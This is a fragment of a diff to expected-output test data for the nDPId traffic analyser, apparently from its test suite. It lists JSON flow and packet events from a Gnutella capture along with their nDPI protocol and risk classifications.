+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":83805,"flow_last_seen":84251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90740,"flow_last_seen":91408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90742,"flow_last_seen":91375,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90746,"flow_last_seen":91439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3759,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +01250{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":90746,"flow_last_seen":90948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3245,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1144,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":91415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":903,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3367,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":219447,"flow_last_seen":219447,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":219447,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.187.171.240","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3367,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":219447,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":219447,"pkt":"UlQAEjUCCAAn5uVZCABFAABD+bUAAIARLzoKAAIPWbur8HAJGMoAL2mkIFAxArFAxy3\/Egk2kZ9VAwABABAAAADDA1NDUEECglZDRUdUS0di"} 
00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":40005,"flow_last_seen":43055,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
@@ -1402,9 +1399,12 @@ 00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":62539,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90743,"flow_last_seen":96110,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":40232,"flow_last_seen":40630,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90743,"flow_last_seen":101917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":628,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90744,"flow_last_seen":98168,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90743,"flow_last_seen":101917,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229238,"flow_last_seen":229238,"flow_idle_time":180000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":229238,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.172.56.198","src_port":28681,"dst_port":11984,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":229238,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":229238,"pkt":"UlQAEjUCCAAn5uVZCABFAABpeXIAAIARIJEKAAIPW6w4xnAJLtAAVXM5R05EED9JAQFMQVEyUApVRFBdL+I1CXBBRaArSAlETnBpbmtmbG95ZEANSVVSTABQRlMARE4AQQAQTkFUAF0v4jUxAgBkGsTy6U4JcA8="} 
00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3452,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229238,"flow_last_seen":229238,"flow_idle_time":180000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":229238,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.131.202.24","src_port":28681,"dst_port":44748,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -1415,8 +1415,8 @@ 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3454,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":229239,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":229239,"pkt":"UlQAEjUCCAAn5uVZCABFAABpd+QAAIARdQcKAAIPWHrpD3AJLOAAVT9CR05EED9MAQFMQVEyUApVRFBdL+I1CXDHjOZsSAlETnBpbmtmbG95ZEANSVVSTABQRlMARE4AQQAQTkFUAF0v4jUxAgBkGsTy6U4JcA8="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3455,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229240,"flow_last_seen":229240,"flow_idle_time":180000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":229240,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"62.35.190.5","src_port":28681,"dst_port":18604,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3455,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":229240,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":229240,"pkt":"UlQAEjUCCAAn5uVZCABFAABpQyQAAIAR7ygKAAIPPiO+BXAJSKwAVQDtR05EED9NAQFMQVEyUApVRFBdL+I1CXAx8WVwSAlETnBpbmtmbG95ZEANSVVSTABQRlMARE4AQQAQTkFUAF0v4jUxAgBkGsTy6U4JcA8="} 
-00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":90738,"flow_last_seen":115276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":232090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":180000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":1042,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":90738,"flow_last_seen":115276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00630{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129210,"flow_last_seen":129210,"flow_idle_time":120000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"84.197.97.94","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00565{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61191,"flow_last_seen":61191,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.2","src_port":57619,"dst_port":5351,"l4_proto":"udp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00550{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61191,"flow_last_seen":61191,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.2","src_port":57619,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -1689,7 +1689,7 @@ 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71540,"flow_last_seen":71540,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"154.3.42.104","src_port":28681,"dst_port":11804,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71537,"flow_last_seen":71537,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.126.102","src_port":28681,"dst_port":5193,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71537,"flow_last_seen":71537,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.126.102","src_port":28681,"dst_port":5193,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":126831,"flow_last_seen":130215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10878,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 